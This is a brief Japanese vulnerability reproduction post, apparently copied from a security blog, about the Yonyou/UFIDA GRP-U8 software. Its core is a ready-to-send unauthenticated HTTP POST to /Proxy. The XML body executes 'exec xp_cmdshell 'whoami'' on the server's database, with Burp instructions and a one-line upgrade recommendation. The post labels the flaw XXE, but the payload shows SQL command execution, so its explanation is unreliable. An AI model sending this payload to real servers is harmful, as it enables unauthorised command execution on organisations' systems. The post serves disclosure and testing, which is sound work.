0x00の脆弱性の説明
用友GRP-u8にはXXEの脆弱性があります。これは、アプリケーションがXML入力を解析するときに外部エンティティが読み込まれず、悪意のある外部ファイルが読み込まれるために発生します。
0x01脆弱性エクスプロイト条件
ログインする必要はありません
0x02脆弱性の再発
POC:
POST /Proxy HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: localhost
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
burpはパケットをキャプチャし、URLを/ Proxyに変更し、ペイロードを本文に追加します
0x03修理の提案
最新バージョンにアップグレードする
次のことを示してください:Adminxeのブログ » UFIDA GRP-u8XXE脆弱性の再現